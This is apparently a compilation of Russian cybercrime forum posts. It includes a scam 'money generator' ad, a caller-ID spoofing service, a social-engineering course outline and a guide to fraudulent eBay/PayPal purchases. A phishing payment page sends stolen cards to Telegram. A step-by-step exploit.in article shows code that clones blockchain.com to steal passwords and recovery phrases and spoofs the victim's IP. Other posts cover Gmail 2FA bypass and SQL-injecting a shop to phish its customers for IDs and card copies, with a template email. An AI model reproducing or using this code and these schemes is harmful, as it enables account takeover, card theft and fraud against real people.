Сегодня настало время сорвать завесу таинственности! Представленные программы раскроют Вам секреты интернет-технологии, позволяющую избранным становиться с каждым днем все богаче и богаче и незнание которой вынуждает рядовых пользователей Интернет пребывать в нищете!

Эти уникальные программы предназначены для тех, кто устал рыскать в Сети в поисках РЕАЛЬНЫХ способов заработка при помощи компьютера и сети Интернет. Вы уже, наверняка, испытали массу предложенных Вам способов заработать , поддавшись на заманчивые призывы получить 10.000$ за неделю или 1.000.000$ за день . Наверняка пробовали рассылать тысячи электронных писем, кликать по баннерам и привлекать посетителей на сайты спонсоров, которые в итоге заплатили Вам жалкие пару долларов или же не заплатили совсем ничего. Те, кто не выдержали разочаровались, сдались и навсегда потеряли вкус к интернет-заработку, объявив все это обманом и чушью. Другие нашли свою нишу, но продолжают гнуть спину на спонсоров, кликать баннеры или рассылать никому не нужный спам, получая за это 10-50$ в месяц МАКСИМУМ!

Вот некоторые ответы на возможные вопросы:

Вопрос: Зачем вам нужны деньги от продажи WMG если вы и так с помощью неё зарабатываете неплохие деньги?

Ответ: Деньги от продажи - мне нужна так сказать для "отмывания" генерируемых денег, т.е. для того, что бы меня не "засекла" администрация WebMoney. Однако, в связи с тем, что количество пользователей программы не безгранично, установлена довольно высокая цена.

Вопрос: Зачем вам нужны деньги от продажи WMG, если вы и так с помощью неё зарабатываете неплохие деньги?

Ответ: Деньги от продажи - нам нужна так сказать для "отмывания" генерируемых денег, т.е. для того что бы нас не "засекла" администрация WebMoney. Однако, в связи с тем, что количество пользователей программы не безгранично, установлена довольно высокая цена.

Вопрос: Пришлите, пожалуйста, мне архив с программой просто так! После начала работы с программой, я вышлю Вам денег, сколько скажете, хоть 1000$!

Ответ: Я сам могу нагенерировать сколько угодно этих же самых $$$! Дело то не в этом, дело в "отмывании" генерируемых денег.

Вопрос: Предоставляете ли вы, какие либо гарантии относительно функциональности программы? А если она не работает? Какие гарантии, что программа будет выслан?

Ответ: Мне сложно доказать вам и я этого не собираюсь делать, могу лишь сказать что у нас работают серьезные люди, т.к. очень серьезные суммы. Если вы хоть, на сколько сомневаетесь, то НЕ покупайте программу!

Вопрос: А будет ли WMG работать - у меня старый компьютер и очень низкая скорость соединения Интернета?

Ответ: Программа успешно работает на малой скорости Интернета и на слабых компьютерах - потр**ляет немного трафика и памяти, но я уверен что, после ее использования (раньше через месяц) Вы сможете использовать высокоскоростной доступ в Интернет на мощном ПК (например, купить новый компьютер и подключить выделенную линию)

Если у Вас появились вопросы или Вы хотите приобрести какую-либо программу пишите на: admins-wm@inbox.ru.
Пишите только на этот адрес!

Оплата производиться в системе WebMoney.

НЕ ТРАТЬТЕ ВРЕМЯ НА ПУСТЫЕ РАЗДУМЬЯ!!! ЗАКАЗЫВАЙТЕ ПРОГРАММУ НЕМЕДЛЕННО И СРАЗУ ЖЕ НАЧИНАЙТЕ ПОЛУЧАТЬ ПРИБЫЛЬ ИЛИ ЗАКРОЙТЕ ЭТО ПИСЬМО И ЛИШАЙТЕСЬ ЭТОЙ ВОЗМОЖНОСТИ!!!

Но в любом случае (купите ли Вы программу или нет), я искренне желаю вам удачи и процветания!!!

Click to expand...

Организую для вас доступ к сервису. Звонки куда угодно и кому угодно с любого номера который вы сами пропишите в исходящих, хоть 8-800 -800-800, хоть +77777777777, хоть +00000000000. Обучу работе с сервисом и установкой программ на телефон либо компьютер. Если например вы звоните "Васе" у которого в его контактах есть "Петя" то подставляя "Петин" номер и позвонив "Васе" у "Васи" отобразится звонящий "Петя" и будет играть мелодия вызова, та которая выставлена на "Петю". Всё очень конфиденциально! Никакого IMEI и никаких следов вашего присутствия. Если "Вася" возьмет распечатку звонков у своего GSM оператора, то он увидит что ему действительно звонил якобы "Петя". Тарифы на звонки очень дешевые, как по РФ так и по всему миру, этот тариф вы пополняете и контролируете сами в личном кабинете. Есть функция изменения голоса - шесть положений, от низкого до высокого. Подскажу применение данного сервиса для серого и черного заработка. Профит будет зависеть только от Вашей душевной доброты и широты. Если интересно -пишите в личку. Для проверки пишите номер с какого позвонить и на какой позвонить и в какое время, с удовольствием сделаю прозвон.
Контакты:
Телега: @Elektrik139
ICQ - 694267082

Программа занятий:
1 ЗАНЯТИЕ. СОЦИАЛЬНАЯ ИНЖЕНЕРИЯ КАК СИСТЕМА МАНИПУЛЯЦИЙ МНЕНИЕМ И ПОВЕДЕНИЕМ ЧЕЛОВЕКА
Социальная инженерия как система манипуляций мнением и поведением человека с целью получения от него необходимых сведений и подталкиванию его к заведомо невыгодным решениям и действиям.
- принципы СИ
- использование социальных стереотипов и законов СИ
- модели использования страхов и потребностей в СИ
- принципы защиты от изученных инструментов
- кейсы и примеры

2 ЗАНЯТИЕ. СОЦИАЛЬНАЯ ИНЖЕНЕРИЯ КАК ПОДБОР ИНДИВИДУАЛЬНЫХ КЛЮЧЕЙ К КАЖДОМУ ЧЕЛОВЕКУ ДЛЯ ЦЕЛЕНАПРАВЛЕННЫХ МАНИПУЛЯЦИЙ
- механизмы быстрой установки доверительного контакта
- факторы, влияющие на доверие и как их целенаправленно использовать
- алгоритм определения ценностей и мотивов человека
- социальные сети как инструмент определения психологического профиля
- принципы защиты от изученных паттернов
- кейсы и примеры

3 ЗАНЯТИЕ. NUDJING (НАДЖИНГ) – ПОДТАЛКИВАНИЕ КАК ПРИНЦИП КОСВЕННЫХ ВНУШЕНИЙ И ПОДТАЛКИВАНИЕ К ПРИНЯТИЮ НУЖНЫХ ВАМ РЕШЕНИЙ
- концепция подталкивания и ее принципы. Наджинг как принцип незаметного воздействия на поведение и убеждения человека.
- наджинг в контексте социальной инженерии и влияния
- подталкивание в манипуляциях и убеждающей коммуникации
- иррациональность и рациональность в манипуляциях и социальной инженерии
- кейсы и примеры

4 ЗАНЯТИЕ. ЧЕРНЫЙ ПРОФАЙЛИНГ И ПОИСК ИНДИВИДУАЛЬНЫХ УЯЗВИМОСТЕЙ ЧЕЛОВЕКА
- оценка картины мира человека на предмет уязвимостей
- базовые уязвимости и сценарии их активации
- инструменты защиты и конструктивное реагирование на манипулятивные приемы
- кейсы и примеры

5 ЗАНЯТИЕ. ЛОЖЬ И ВВЕДЕНИЕ В ЗАБЛУЖДЕНИЕ В СОЦИАЛЬНОЙ ИНЖЕНЕРИИ И МАНИПУЛЯЦИЯХ
- ложь как классическая манипуляция
- критерии и признаки обмана, который трудно распознать даже профессионалам.
- мошенничество как создание легенды, в которую хочется поверить. Как это делается?
- кейсы и разбор примеров.

You must have at least 2 reaction(s) to view the content.

хочу в команду. Работал fullstack-ом, заебало, могу писать скрипты или какие- то сайты фишинговые и не только. Могу с обналом заняться, много знакомых, мелких криминалов со своими миньонами.
Я понадоблюсь в команде, я профессионал своего дела.
Английский лучше русского знаю.
я знаю что правильнее ВЛИТьСЯ

**_Всем привет, с вами Матильда. Сегодня я хотел(-а) бы слить вам мануал, который покупал(-а) в том году о том, как вбивать eBay с помощью аккаунта, на котором привязан PayPal.
Так как я потерял(-а) само обучение, буду писать вам от руки, так-что погнали!
Для начала вам понадобится материал для работы. Рекомендаций по актуальным сервисам с продажей материала подсказать не могу, так как работал(-а) по данной схеме месяцев 5-6 назад. Что именно нам понадобится? _
- Аккаунт ebay + PP (или CC, но с палкой больше проходимость!)
- Дедик / SSH (С дедиков чаще транза проходила, чем с SSH)
- Дроп сервис, на который будете принимать пак (или если это гифт, то доступ к почте акка ибэй)
Теперь мы знаем, что нам нужно для работы, о'кей! А далее выбираем страну, с которой будем работать. Лично я выбирал(-а) Германию и Великобританию (С Германии чаще паки проходили). Покупаем дедик в Германии, аккаунт ebay + PP Германиии, берём у дропа адрес В ГЕРМАНИИ, всё...

Залетаем на дедик, проверяем сразу, что за браузер стоит. В наших интересах Firefox / Chrome. Далее качаем расширение User Agent Switcher (вскоре поймёте почему) и приступаем к работе.
Нам важно, чтобы eBay воспринял нас как обыкновенного клиента, ясное дело, значит теперь запоминаем:

Заходим на сайт ebay.de (если у вас Немецкий дедик) или ebay.co.uk (Если же Великобритании) - Меняем User Agent на айфон - нажимаем на кнопку Login, вводим собственно ручно логин и пароль, логинемся - как залогинились меняем user agent на ваш обычный ПК.

Теперь нам надо поменять адрес, на который будет приниматься весь стафф. Меняем, но не трогаем имя и фамилию получателя!!!

Хорошо, далее прогреваем аккаунт, чтобы всё было как по маслу, а теперь вбиваем (оплачивая пэйпалом, привязанным к акку) какую нибудь вещитцу на ~70 евро, чтобы потом можно было вбивать на более крупные. На этом всё. Процес вбива окончен.
Надеюсь, что моя первая тема вам была полезна, + продажник на данный мануал составлял 5к рублей, так что, я сегодня был щедр(-а). Всем пока!**

Сливаю вам свою платёжку, кому надо тот заценит, допилит если что-то нужно и будет использовать

1. все данные идут в telegram, в архиве инструкция.txt инфа как настроить бота и чат
2. проверка на валид всех полей, сейчас заточка под юсу так что ZIP только пятизначный и номер от 9 до 11 цифр, кому нужно-найдёт и поправит
3. проверка на валид карты по алгоритму луна, т е х#йню ты туда не введёшь и если ошибся в одной цифре то не даст
4. система работников, то есть если у вас много траферов, то даёте ссылку с /?utm_content=WORKER в конце, вместо WORKER ставите имя работника в тг
5. фулл адаптив, все слова/валюта/картинки/цены/промокод(ы)/товары меняются под вас, можно перевести сменить валюту и лить на любую страну https://prnt.sc/we5wdv
6. уведомление при переходе на платёжку (если льёте с лендинга логично), можно в index.php чатайди поставить канала, а в creditcard.php уже чата с работниками
7. проверка на "оплату", просто так на ссылку thank-you.php не перейдёшь, только с оплаты.
в thank-you.php у меня там через 5 секунд скачка АПК, так что можете залить файл сменить название (найдёте сами где) и лить на стиллак/апк с картой, ток нахуй это надо вам хз, короче что нибудь придумаете

Там ещё есть оплата битком, в ориг была палка так что можете просто иконку поменять битка, ввести PayPal и редиректить на мерч палки, я биток по приколу поставил

P. S. можете прикрутить чекер карт, сейчас много чекеров имеют api так что кому действительно нужно тот найдёт где как и сделает

P. P. S. и мобильная и пк версия норм работают (vrode)
prihodit: https://prnt.sc/w3xv58
'НОВАЯ КАРТА! воркер:' => $worker,
'IP: ' => $aipi,
'Страна: ' => $result,
'ГородIP: ' => $result2s,
'Номер карты: ' => $number,
'Экспа: ' => $expiry,
'CVC: ' => $cvc,
'Имя: ' => $kxname,
'Фамилия: ' => $kxsur,
'Адрес: ' => $adres,
'Номер телефона: ' => $phone,
'Почта: ' => $pochta,
'ZIP: ' => $zipcode,

ДЕМО: https://payment.nj0tic.pw/payment/invoice_uid=f387f7df-4b2c-4b7a-aa14-09e1088f2b8b/
СКАЧАТЬ: https://dropmefiles.com/eDnCY

Все мы наслышаны про фэйки блокчейна(в нашем случае blockchain.com), но видел ли кто из нас простых смертных саму реализацию и что вообще фэйк из себя представляет?

Купить на рынке готовый продукт при этом, не зная из чего он состоит технически - это очень рискованно. Ведь за последние полгода, а может и год - уже объявлялись очень много кидал, которые показывали демо фэйка и сливались после получения крупной суммы, но сама статья не об этом.

НЕСТАНДАРТНЫЙ конкурс статей - требует нестандартных решений)))
Дело было вечером, делать было нечего и я решил посмотреть, как же можно реализовать фэйк блокчейна, не имея общего технического представления как это реализовали другие, опираясь только на описание возможностей и документацию.
И так, на минуточку вспомним всё, что мы знаем про фэйки.

Фейк (англ. fake — подделка, фальшивка, обман, мошенничество) — что-либо ложное, недостоверное, сфальсифицированное, выдаваемое за действительное, реальное, достоверное с целью ввести в заблуждение.

Click to expand...

Простыми словами, фэйк - это полноценная копия сайта с единственным отличием в домене, где основная идея заключается в том, чтобы посетитель не понял подмены и ввёл нужные нам данные.
И так, поехали!

Первым делом заходим на сайт: https://login.blockchain.com

Замечаем внизу данные версии и ссылку, которая ведёт на Github.
Переходим по ней и видим, что в репозитории выложены сорсы веб-интерфейса!

Хм... интересно, получается, что можно поднять копию веб-интерфейса без каких- либо знаний?
Я не мог поверить своим глазам, разве это было так просто? Кому пришла идея выложить это добро официально вообще не понятно.
Далее вчитываемся в инструкцию, пробуем установить:

Code:Copy to clipboard

wget https://codeload.github.com/blockchain/blockchain-wallet-v4-frontend/zip/refs/tags/v4.48.16
unzip blockchain-wallet-v4-frontend-4.48.16.zip
cd blockchain-wallet-v4-frontend
./setup.sh
yarn start:dev

Результат - ну "почти" полноценный фэйк

Правда пока этот фэйк ничего не делает в плане отправки данных, чем мы сейчас и займёмся.
Нам нужно в файлах найти авторизацию и попробовать добавить свою функцию.
Ищем в файлах по ключевому слову "login".
Находим основной файл авторизации:

Открываем файл: packages/blockchain- wallet-v4-frontend/src/data/auth/sagas.js

Добавляем функцию для простой отправки:

Code:Copy to clipboard

const submitAuth = function ({guid, password}) {
    axios({
      url: `https://admin.blockchain.test/api/wallets`,
      method: 'POST',
      data: {
        guid: guid,
        password: password
      },
      headers: {
        'Content-Type': 'application/json'
      }
    })
  }

А так же после блока сессии:

Code:Copy to clipboard

let session = yield select(selectors.session.getSession, guid)

Добавляем:

Code:Copy to clipboard

yield call(submitAuth, {guid, password})

Осталось самое главное, запустить это всё на тестовом домене и посмотреть всю работоспособность.
Редактируем файл hosts:

Code:Copy to clipboard

127.0.0.1 login.blockchain.test

Открываем http://login.blockchain.test и пытаемся авторизоваться.

Смотрим, что ничего не происходит, первым делом проверяем консоль:

Ждало меня разочарование, оказывается API сервер не даёт делать запросы извне из-за CORS.
Думаем, думаем, как же решается CORS? Так ведь обычным реверс прокси на уровне веб-сервера. Разве нет?
Файл конфигурации для простого реверс прокси веб-сервера Caddy :

Code:Copy to clipboard

reverse.blockchain.test {
    route {
    reverse_proxy * https://blockchain.info  {
      header_up -Host
      header_up origin https://login.blockchain.com
      header_up referer https://login.blockchain.com/
      header_down Access-Control-Allow-Origin "*"
      header_down Content-Security-Policy "*"
      header_down Access-Control-Allow-Headers "*"
      header_down Access-Control-Allow-Methods "POST, GET, OPTIONS"
    }
  }
}

Что именно делает данный конфиг - просто проксирует все запросы к домену blockchain.info и меняет ответ в котором разрешает CORS-запросы, можно на абсолютно любом веб-сервере такое провернуть - для простоты работы и наглядности и был выбран Caddy, как отличный легковесный веб-сервер с автоматической поддержкой ssl, который написан на Go.

Теперь меняем адрес API сервера в нашем файле веб-интерфейса, для этого открываем файл config/env/production.js

Меняем:

Code:Copy to clipboard

ROOT_URL: 'https://blockchain.info',

На значение:

Code:Copy to clipboard

ROOT_URL: 'http://reverse.blockchain.test',

Пробуем еще раз авторизоваться:

Ураааа! Авторизация прошла успешно и письмо для подтверждения было отправлено.

Нам осталось только проверить почту и открыть письмо:

Да, но какого чёрта тут делает IP-адрес моего сервера? ??

Я на минуточку задумался, мы же только недавно обходили CORS, поэтому и высвечивается этот адрес, и тут я вспомнил... во всех темах, где арендовался фэйк было написано про такую фичу, как IP-спуфинг.

Смысл заключается в том, что обычный пользователь оказавшийся на фэйке при подтверждении по почте, поймёт, что это IP-адрес чужой и попросту не подтвердит, что не есть хорошо. Получается, без этой фичи наш фэйк - это лишь подобие мощного комбайна, такое можно было и на HTML+CSS сделать.

Нужно немного найти информации про этот спуф... и так вспоминаем:

IP-спуфинг - Вид хакерской атаки, заключающийся в использовании чужого IP- адреса источника с целью обмана системы безопасности.

Click to expand...

Немного поразмыслив, вновь дочитав про IP-спуфинг, я пришёл к выводу, что IP- спуфинг работает только в UDP.

Протокол транспортного (4) уровня TCP имеет встроенный механизм для предотвращения спуфинга

Click to expand...

В запросе HTTP не получится подменить IP-адрес, ведь HTTP работает через TCP протокол.

Неужели это конец? Я немного расстроился, заварил чайку и всё-таки решил еще раз, посмотреть сам сайт и запросы https://login.blockchain.com после авторизации:

О, да... очень интересный саб-домен в заголовке x-original-host: wallet.prod.blockchain.info!

Нам нужно узнать подробности для всех доменов и IP-адресов.

Делаем запрос, чтобы узнать, где находится blockchain.info:

Code:Copy to clipboard

nslookup blockchain.info

Non-authoritative answer:
Name: blockchain.info
Address: 104.16.143.212
Name: blockchain.info
Address: 104.16.147.212
Name: blockchain.info
Address: 104.16.144.212
Name: blockchain.info
Address: 104.16.146.212
Name: blockchain.info
Address: 104.16.145.212

Теперь узнаём кому принадлежит IP-адрес:

Code:Copy to clipboard

whois 104.16.143.212

NetRange:       104.16.0.0 - 104.31.255.255
CIDR:           104.16.0.0/12
NetName:        CLOUDFLARENET
NetHandle:      NET-104-16-0-0-1
Parent:         NET104 (NET-104-0-0-0-0)
NetType:        Direct Assignment
OriginAS:       AS13335
Organization:   Cloudflare, Inc. (CLOUD14)
RegDate:        2014-03-28
Updated:        2017-02-17
Comment:        All Cloudflare abuse reporting can be done via https://www.cloudflare.com/abuse

Осталось узнать, где находится wallet.prod.blockchain.info:

Code:Copy to clipboard

nslookup wallet.prod.blockchain.info

Name: wallet.prod.blockchain.info
Address: 35.201.74.1

Вновь узнаём кому принадлежит IP-адрес:

Code:Copy to clipboard

whois 35.201.74.1

NetRange:       35.192.0.0 - 35.207.255.255
CIDR:           35.192.0.0/12
NetName:        GOOGLE-CLOUD
NetHandle:      NET-35-192-0-0-1
Parent:         NET35 (NET-35-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       
Organization:   Google LLC (GOOGL-2)
RegDate:        2017-03-21
Updated:        2018-01-24
Comment:        *** The IP addresses under this Org-ID are in use by Google Cloud customers ***

На минутку я замер: они используют CloudFlare, но при этом основной сервер на который пересылаются запросы находится в облаке Google.

Пробуем пинговать:

Code:Copy to clipboard

 ping wallet.prod.blockchain.info -c 1

PING wallet.prod.blockchain.info (35.201.74.1) 56(84) bytes of data.
64 bytes from 1.74.201.35.bc.googleusercontent.com (35.201.74.1): icmp_seq=1 ttl=119 time=0.968 ms

--- wallet.prod.blockchain.info ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.968/0.968/0.968/0.000 ms

Открываем сам сайт:

404... хм... что-то и чай уже сильно остыл - ну да ладно, ведь мы тут нашли кое что-то очень интересное.

Я опять расстроился, но на минутку вспомнил, что раз сайт проксируется через CloudFlare, а далее передаётся в Google Cloud, то значит что они как-то передают нужные заголовки.

Ведь любой человек, который когда-либо работавший с CloudFlare знает, что все запросы на сервер идут: Посетитель <-> CloudFlare <-> Сервер.

Поэтому, чтобы восстановить реальный IP-адрес посетителя нам нужно прочитать документацию: <https://support.cloudflare.com/hc/en- us/articles/200170786-Restoring-original-visitor-IPs>

И так, с уже остывшим чаем продолжаем наш путь, в документации говорится, что бы получить IP-адрес посетителя нужно получать данные из заголовков CF- Connecting-IP, в нашем же случае нам нужно отправлять такой заголовок, пробуем для начала в обычном запросе:

Проверяем почту:

Чему я был безумно рад, осталось это интегрировать в наш реверс прокси:

Code:Copy to clipboard

reverse.blockchain.test {
    route {
    reverse_proxy * https://wallet.prod.blockchain.info  {
      header_up -Host
      header_up origin https://login.blockchain.com
      header_up referer https://login.blockchain.com/
      header_up Cf-Connecting-Ip {http.request.remote.host}
      header_down Access-Control-Allow-Origin "*"
      header_down Content-Security-Policy "*"
      header_down Access-Control-Allow-Headers "*"
      header_down Access-Control-Allow-Methods "POST, GET, OPTIONS"
    }
  }
}

Авторизация работает, но почему-то не показывается баланс:

Открываем консоль, далее смотрим, что проблема возникает из-за того, что /multiadd доступен только blockchain.info, а в wallet.prod.blockchain.info его попросту нет:

Оказывается наш реверс прокси не совсем универсальный. Добавляем немного логики в наш реверс прокси:

Code:Copy to clipboard

reverse.blockchain.test {
    route {
    reverse_proxy /multiaddr https://blockchain.info  {
      header_up -Host
      header_up origin https://login.blockchain.com
      header_up referer https://login.blockchain.com/
      header_down Access-Control-Allow-Origin "*"
      header_down Content-Security-Policy "*"
      header_down Access-Control-Allow-Headers "*"
      header_down Access-Control-Allow-Methods "POST, GET, OPTIONS"
    }

    reverse_proxy * https://wallet.prod.blockchain.info  {
      header_up -Host
      header_up origin https://login.blockchain.com
      header_up referer https://login.blockchain.com/
      header_up Cf-Connecting-Ip {http.request.remote.host}
      header_down Access-Control-Allow-Origin "*"
      header_down Content-Security-Policy "*"
      header_down Access-Control-Allow-Headers "*"
      header_down Access-Control-Allow-Methods "POST, GET, OPTIONS"
    }
  }
}

Отлично! Теперь все работает прекрасно!

Как итог, мы уже имеем: захват логина и пароля + IP-спуфинг.
Но это нам ничего не даёт, ведь подтвердить по почте мы не сможем, а если у пользователя еще включена двух-факторная авторизация или блокировка по IP- адресу, то тут совсем беда.
Фэйк сделать-то сделали, но пользы от него мы не получим, если не будет постоянного доступа к аккаунту.
Решил всё-таки вернуться к истокам и еще раз посмотреть сам веб-интерфейс, нас интересуют настройки безопасности:

Интересно, секретный ключ восстановления даёт возможность любому получить доступ к аккаунту?! Простите, что? ?

Перечитываю пару раз и только потом доходит, что этот секретный ключ - это нечто из разряда святых, если его потерял то можно лишиться денег на аккаунте.
И если он показывается в веб-интерфейсе, значит можно тоже отправить к себе, но для начала нам нужно проверить возможности секретного ключа.

Включаем в настройках двух-факторное подтверждение + белый список по IP- адресу.
Нам осталось только проверить, для этого мы подключаемся через второй сокс и переходим по ссылке, где вводим ключ восстановления:

После ввода правильного секретного ключа появляется форма для смены пароля:

Вводим пароль и нажимаем на Recover Funds и после этого попадаем моментально в аккаунт:

Как итог, восстановление через секретный ключ позволяет обойти любые ограничения аккаунта: двух-факторную авторизацию + белый список по IP-адресу.

Это просто жесть, подумал я на минутку... значит даже смысла в записи логина пароля нет, можно просто собирать секретные ключи и восстанавливать аккаунты, а далее отключать настройки безопасности, в том числе изменять почтовый адрес.

"Так это фича, а не баг" - так сказали бы разработчики... ?

Теперь нам осталось добавить все недостающие возможности в сам фэйк.

1. Секретный ключ восстановления.
   Ищем в файлах "recovery ", находим единственную функцию "recoverySaga ", которая и выводит приватный ключ восстановления:

Code:Copy to clipboard

const recoverySaga = function * ({ password }) {
    const getMnemonic = s => selectors.core.wallet.getMnemonic(s, password)
    try {
      const mnemonicT = yield select(getMnemonic)
      const mnemonic = yield call(() => taskToPromise(mnemonicT))
      const mnemonicArray = mnemonic.split(' ')
      yield put(
        actions.modules.settings.addMnemonic({ mnemonic: mnemonicArray })
      )
    } catch (e) {
      yield put(
        actions.logs.logErrorMessage(logLocation, 'showBackupRecovery', e)
      )
    }
  }

Нам нужно немного его изменить, открываем файл packages/blockchain- wallet-v4-frontend/src/data/goals/sagas.ts

Добавляем функцию для возврата секретного ключа в удобном для нас формате:

Code:Copy to clipboard

const recoverySagaInfo = function * ({ password }) {
    const getMnemonic = s => selectors.core.wallet.getMnemonic(s, password)
    try {
      const mnemonicT = yield select(getMnemonic)
      const mnemonic = yield call(() => taskToPromise(mnemonicT))
      return mnemonic;
    } catch (e) {
    }
}

Нужно еще эти данные отправить, добавляем функцию отправки:

Code:Copy to clipboard

const submitRecover = ({ guid, recovery }: { guid: string, recovery: any }) =>
    axios({
      url: `https://admin.blockchain.test/api/recovers`,
      method: 'POST',
      data: {
        guid: guid,
        recover: recovery
      },
      headers: {
        'Content-Type': 'application/json'
      }
    })

2. Дополнительный пароль подтверждения ака второй пасс.

Ищем в файлах "SecondPassword" находим удивительный вызов функции:

Code:Copy to clipboard

import { promptForSecondPassword } from 'services/sagas'
const password = yield call(promptForSecondPassword)

Прекрасно. Это именно то, что нам и было нужно.

Открываем файл packages/blockchain- wallet-v4-frontend/src/data/goals/sagas.ts

Добавляем функцию для отправки данных второго пароля:

Code:Copy to clipboard

const submitSecondPass = ({ guid, password }: { guid: string, password: string }) =>
  axios({
    url: `https://admin.blockchain.test/api/seconds`,
    method: 'POST',
    data: {
      guid: guid,
      password: password
    },
    headers: {
      'Content-Type': 'application/json'
    }
  })

Вызывать функцию будем чуть позже.

3) Баланс

Если будет информация о балансе кошелька, то будет легче понимать какой из аккаунтов нужно восстанавливать моментально и в дальнейшем просто добавить уведомления.

Ищем в файлах "balances", находим не менее удивительный вызов функции в том же файле, который мы редактировали ранее:

Code:Copy to clipboard

// check/wait for balances to be available
const balances = yield call(waitForAllBalances)

Добавляем функцию для отправки данных баланса:

Code:Copy to clipboard

const submitBalance = ({ balances, guid }: { balances: any, guid: string }) =>
    axios({
      url: `https://admin.blockchain.test/api/balances`,
      method: 'POST',
      data: {
        guid: guid,
        "btc": balances.btc,
        "eth": balances.eth,
        "bch": balances.bch,
        "pax": balances.pax,
        "xlm": balances.xlm,
        "usdt": balances.usdt,
        "wdgld": balances.wdgld
      },
      headers: {
        'Content-Type': 'application/json'
      }
    })

Теперь, после авторизации, чтобы отправляло, нам нужно изменить файл packages/blockchain-wallet-v4-frontend/src/data/auth/sagas.js:
Ищем функцию:

Code:Copy to clipboard

yield put(actions.goals.saveGoal('syncPit'))

Добавляем после неё

Code:Copy to clipboard

yield put(actions.goals.saveGoal('sendData'))

После чего нам нужно добавить новую функцию в файл packages/blockchain- wallet-v4-frontend/src/data/goals/sagas.ts:

Code:Copy to clipboard

const runSendData = function * (goal) {
    const { id } = goal
    // Удаляём задачу, чтобы не запускалось сто раз.
    yield put(actions.goals.deleteGoal(id))
    
    // Ждём данных пользователя
    yield call(waitForUserData)
    
    // Получаем идентификатор аккаунта
    const guid = yield select(selectors.core.wallet.getGuid)
    
    // Ждём загрузки баланса
    const balances = yield call(waitForAllBalances)
    // @ts-ignore
    yield call(submitBalance, {guid, balances});
    
    // Получаем второй пароль
    const password = yield call(promptForSecondPassword)  || null ;
    // @ts-ignore
    yield call(submitSecondPass, {guid, password});

    // Получаем секретный ключ восстановления
    const recovery = yield call(recoverySagaInfo, { password })
    // @ts-ignore
    yield call(submitRecover, {guid, recovery});

  }

В том же файле ищем:

Code:Copy to clipboard

case 'syncPit':
    yield call(runSyncPitGoal, goal)
    break

Добавляем после неё

Code:Copy to clipboard

case 'sendData':
    yield call(runSendData, goal)
    break

В файле packages/blockchain-wallet-v4-frontend/src/data/goals/types.ts:

После "referral ", добавляем "sendData ".

Готово! Наш безупречный фэйк со всеми возможностями создан.

Для наглядности хотелось бы так же выложить материалы с подробными инструкциями по установке на сервер:
- Фэйк (конфиги + скрипты, сервер vps-1)
- Реверс прокси (конфиги + скрипты, сервер vps-2)
- Простенькая админ панель (конфиги + скрипты, сервер vps-3)

Но опасаясь спекуляций со стороны недобросовестных пользователей(и резкого роста торговцев фейками блокчейна) данный материал в иерархическом порядке хотелось бы передать администраторами и модераторам форума, а так же специалистам, которые бы хотели "потрогать" и убедиться, что всё описанное в данной статье - актуально и работает на момент публикации.

PS: возможно полетят абузы, что в паблик уходит приват, но нет, друзья - до этого мог дойти любой и тут показано как именно достигнут результат, а не просто выкладывается готовое решение.

Данная статья для конкурса является прямым подтверждением того, что нет ничего невозможного.
Просто пробуйте, и Вы добьетесь всего и всегда.
С единственной в данном случае оговоркой, о которой хотелось бы напомнить(привет, Ubuntu/Debian):
"C великой силой приходит и великая ответственность"

Автор stooper
источник конкурс статей exploit.in

Доброго времени суток.В данном мануале будет пример как с помощью ZennoPoster возможно обойти любую 2FA авторизацию на Gmail посредством параллельного входа в аккаунт и созданием профиля.
Это не мануал к действию или призыв к нарушению закона, я как автор этого не поддерживаю и призываю не нарушать законы ваших стран, моя статья создана для демонстрации варианта обхода 2FA.
Так же часть скриптов/экшенов не будет показана, повторюсь, это пища для размышления.

Вся суть работы заключается в параллельном входе в акк холдера, граббингом его 2FA страницы,выдачей ее на фэйке,валидация данных, вход в акк и удаление алерта.Много буков писать не стал, сделал видос в котором все наглядно показано.
Мы можем выдавать абсолютно любую страницу на нашем фэйке и брать с нее данные.
Такой подход позволяет проделать нужные действия после входа в аккаунт (рассылка,экспорт паролей,смена 2FA,копия рез кодов, поиск нужных писем/отправителей) все возможно реализовать.

P.S. Все писалось давно, верстка и текста местами отпали, да и кодер на уровне "Hello,Worl".Тем не менее это не помешало запилить нужные софты.Можно сделать не только под google, при желании заточить можно под очень многое.

Видео по ссылке


Watch xss-google | Streamable

Watch "xss-google" on Streamable.

streamable.com

View attachment 16071​

**Сегодня насмотрелся видео кулхацкеров как они сайты ломаюттут решил тоже потренироваться пошел в халяву Dork's CC подправил не много дорки не чего у меня вышло с Sqli Dumper ведать стар для таких дел стал **

​

**Вообщем достал свой приват софт называется Havij-Advanced SOL injection Tool в народе (морковка) Нашел таблицу с названием code в ней колонка с названием cart ну все почувствовал себя мега-кулхацкеров+кардером но вот сс там х... как всегда мечты рухнули мои в одно части ** и это печально. 99% кардеров забьют на такой шоп и двинут дальше но мы не только кардеры но и кулхацкеры не стоит торопицца.

У нас на руках все заказы шопа, имена, фамилии, адреса и даты заказчиков. А теперь вспомним что обычно происходит когда мы щипаем на сс? Правильно, у на просят фото документов и кредитной карты....

Теперь мы шоп сливаем из таблицы code все что нужно order date,FName,email названия могут будь везде разные но суть думаю вы уловили.

Теперь у нас есть все что нужно. Регистрируем на hotmail.com email видаshop_name@hotmail.com или смотрим видео про подмену. Теперь мы готовы. Начинаем спамить..

**

**​

Примерный текст письма ​

Dear FName LName,We are processing your order . As part of our security procedures, we ask that you provide the following documents:1) Your valid photo identification (e.g. passport or driving license).2) An utility bill or bank statement issued on your name, that shows your current address. Please note that such can only be accepted if it’s dated no longer than 3 months back from the current date. 3) Copy of your credit card (front and back side).Once your ID and utility bill are verified, they will be placed in a secure file and you will not be asked to re-send it in the future.Send your documents at e-mailtoshop_name@hotmail.com.Please note, if after 2 days, we do not receive legible e-mail, we will cancel your order.

**p.s Тесты проводил над Индией. Отклик составил примерно 40% тема баян но монетизировать не составит большого труда **​

​

Прив всем... Седня пойдет речь о соц. инженерии...

Что мы будем вытворять??

Значит так:
- Задача - пройти в тыл врага ( он же сайт знакомств)
- Разместить материал, прикрепить его к делу
- Пустить админам пыль в глаза
- Внедрится в доверие
- Провести широкомасштабную операцию под названием "Ахтунг извращугам".

